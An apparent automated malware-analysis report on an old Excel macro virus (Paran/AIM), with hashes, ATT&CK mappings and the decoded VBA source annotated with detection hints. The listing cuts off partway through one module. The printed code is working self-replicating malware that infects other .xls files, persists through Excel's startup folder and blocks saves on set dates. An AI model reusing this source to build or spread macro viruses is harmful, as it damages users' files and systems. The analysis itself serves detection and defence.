Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5a27e0159f27c3e4…

MALICIOUS

Office (OLE)

Size: 53.5 KB | Created: 1999-07-09 08:15:47 | Authoring application: Microsoft Excel | First seen: 2012-06-14
MD5: d0107957a87722e2228beb248cefc5fd SHA-1: c31e45d44f9861b9752dc3ab34558fe708097c31 SHA-256: 5a27e0159f27c3e469e8ad99ba4c99e0237586a7f2f2b1cf364a0671524a910a
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

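This Excel file contains VBA macros designed to infect other Excel workbooks on the system. When the workbook is closed, the macro searches the active workbook's folder and C:\ (including subfolders) for .xls files and copies its code into each one that does not already carry it. It also attempts to establish persistence by saving a copy of the workbook into Excel's startup folder (Application.StartupPath), which Excel loads automatically at launch; because this is Excel's own startup folder rather than a registry Run key or the Windows Startup folder, the behaviour is arguably closer to T1137 (Office Application Startup) than to the T1547.001 mapping listed above. The ClamAV detection 'Xls.Trojan.Paran-1' further supports the malicious nature of this file.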

Heuristics 1

  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5218 bytes
SHA-256: 7cd53a2c2ed398481ace9907caddf0d76180ccbf48fdaf34441fbe02678aa549
Detection
ClamAV: Xls.Trojan.Paran-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Workbook_BeforeClose -- event handler Excel runs when this workbook is being closed.
' Analyst notes (behaviour visible in this listing):
'   * runs SearchAndInfect on the active workbook's folder, then on "c:\"
'   * runs StayResident, which saves a copy under Application.StartupPath
'   * shows the "AIM" component when the current minute equals Int(60 * Rnd)
' The Sub line below, including its trailing "' = AIM" comment, is the exact text
' SearchAndInfect compares with line 1 of other workbooks (its infection marker),
' so it is also a usable static detection string for this sample.
Private Sub Workbook_BeforeClose(Cancel As Boolean) ' = AIM
' Every runtime error in this handler is suppressed, so failures stay invisible to the user.
On Error Resume Next
' Replication pass 1: the folder the current workbook was opened from.
SearchAndInfect (ActiveWorkbook.Path)
' Replication pass 2: the whole C: drive (SearchAndInfect searches subfolders).
SearchAndInfect ("c:\")
' Persistence step.
StayResident
' Rnd yields a value in [0, 1), so Int(60 * Rnd) is 0-59: the form appears only occasionally.
If Minute(Now) = Int(60 * Rnd) Then
AIM.Show
End If
End Sub
' SearchAndInfect -- replication routine of the sample.
'   ipath: root folder that is searched (with subfolders) for "*.xls" files.
' No value is ever assigned to the function name, so nothing meaningful is returned.
' Artifacts visible here that are useful for detection and triage:
'   * file "C:\windows\data.frx" written by the Export call and deleted at the end
'   * workbooks whose ThisWorkbook module starts with the Header string below
'   * a VBA component named "AIM" inside .xls files
' Defensive note: everything below depends on programmatic access to VBProject.
' Current Office versions block that unless "Trust access to the VBA project
' object model" is enabled, so that setting should stay disabled.
Function SearchAndInfect(ipath As String)
' Errors are suppressed for the whole routine; individual steps may fail silently.
On Error Resume Next
' Hides the workbook opens and closes below from the user.
Application.ScreenUpdating = False
Dim code As String
Dim Header As String
' Infection marker: the first line of the ThisWorkbook module in an infected file.
Header = "Private Sub Workbook_BeforeClose(Cancel As Boolean) ' = AIM"
' Lines(start, count): takes 54 lines starting at line 1 of this workbook's ThisWorkbook module.
code = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.lines(1, 54)
' Path is spelled "wondows" in the sample; it differs from the export path on the next line.
Kill "c:\wondows\data.frx"
' Writes the "AIM" component to disk (file-system artifact).
ActiveWorkbook.VBProject.VBComponents("AIM").Export ("C:\windows\data.frx")
' NOTE(review): Application.FileSearch was removed in Office 2007, so this enumeration
' is expected to fail on later versions -- confirm dynamically before relying on it.
Set fs = Application.FileSearch
fs.NewSearch
fs.LookIn = ipath
fs.FileName = "*.xls"
fs.SearchSubFolders = True
fs.Execute
For Each victim In fs.FoundFiles
Set wrkbook = Workbooks.Open(victim)
' Already-infected check: line 1 equals Header and a component named "AIM" exists.
If wrkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.lines(1, 1) = Header And Len(wrkbook.VBProject.VBComponents("AIM").Name) > 0 Then
wrkbook.Close
Else
' Otherwise the captured lines are inserted at line 1 of the target's ThisWorkbook module.
wrkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, code
' The import reads data.frx from Application.Path (Excel's application directory).
wrkbook.VBProject.VBComponents.Import (Application.Path & "\data.frx")
' The modified workbook is written back to disk, so its hash and timestamp change.
wrkbook.Save
wrkbook.Close
End If
Next
' Removes the exported component file again.
Kill "C:\windows\data.frx"
' Screen updating is set to False a second time here; this routine never sets it back to True.
Application.ScreenUpdating = False
End Function
' StayResident -- persistence step of the sample.
' Saves the active workbook as "BOOK1." under Application.StartupPath, Excel's startup
' folder; workbooks stored there are opened automatically when Excel starts.
' Detection hint: an unexpected BOOK1 workbook in the Excel startup folder (XLSTART).
Sub StayResident()
' Screen updating is switched off around the save and restored afterwards.
Application.ScreenUpdating = False
ActiveWorkbook.SaveAs (Application.StartupPath & "\BOOK1.")
Application.ScreenUpdating = True
End Sub
' Workbook_BeforeSave -- event handler Excel runs before the workbook is saved.
' Payload of the sample: on the first day of a month it shows three message boxes,
' each followed by a beep, and then cancels the save. On other days it does nothing.
' The message texts and titles below are usable as static detection strings.
Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
' Date trigger: day-of-month equals 1.
If Day(Now) = 1 Then
MsgBox "Hey man... are you still working?" & vbCr & "Get a life man!", vbSystemModal, "Excell Off-line"
Beep
MsgBox "I can't let you save this workbook today, sorry!", vbApplicationModal, "AIM"
Beep
MsgBox "And don't forget to wash your teeth with AIM" & vbCr & "The best toothpaste", vbApplicationModal, "AIM ADD"
Beep
' Setting Cancel to True makes Excel abandon the save (availability impact for the user).
Cancel = True
End If
End Sub
'End of virus heheh

Attribute VB_Name = "Φύλλο1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Worksheet_SelectionChange -- empty event handler; this sheet module contains no active code.
Private Sub Worksheet_SelectionChange(ByVal Target As Excel.Range)

End Sub

Attribute VB_Name = "Φύλλο2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Φύλλο3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AIM"
Attribute VB_Base = "0{A57A0607-36BE-11D3-B990-E5B940FFCE7F}{A57A05FD-36BE-11D3-B990-E5B940FFCE7F}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
'This workbook has a lot of toothpaste inside
'toothpaste waz produced by yozak
'and AIM's research team!
'Toothapste of the year!AIM
Private Sub CommandButton1_Click()
On Error Resume Next
Dim lines(20) As String
Beep
Data = InputBox("Insert Something!", "yozak99")
If Data = "" Then MsgBox "Emptyness in your head!"
If Data = "toothpaste" Then
MsgBox "You paranoic!"
Else
MsgBox "Paranoic HAHAHHA!!.TOOTHPASTEPARANOIC!", vbSystemModal, "Paran!"
lines(0) = "Season of toothpaste": lines(1) = "Mad toothpaste makers": lines(2) = "Microsoft Toothpaste Progie"
lines(3) = "AIM": lines(4) = "FUCK CREST": lines(5) = "Crazy Toothpaste users": lines(6) = "'Toothpaste": lines(7) = "Yozak uses AIM"
lines(8) = "To protect your teeth use AIM": li
... (truncated)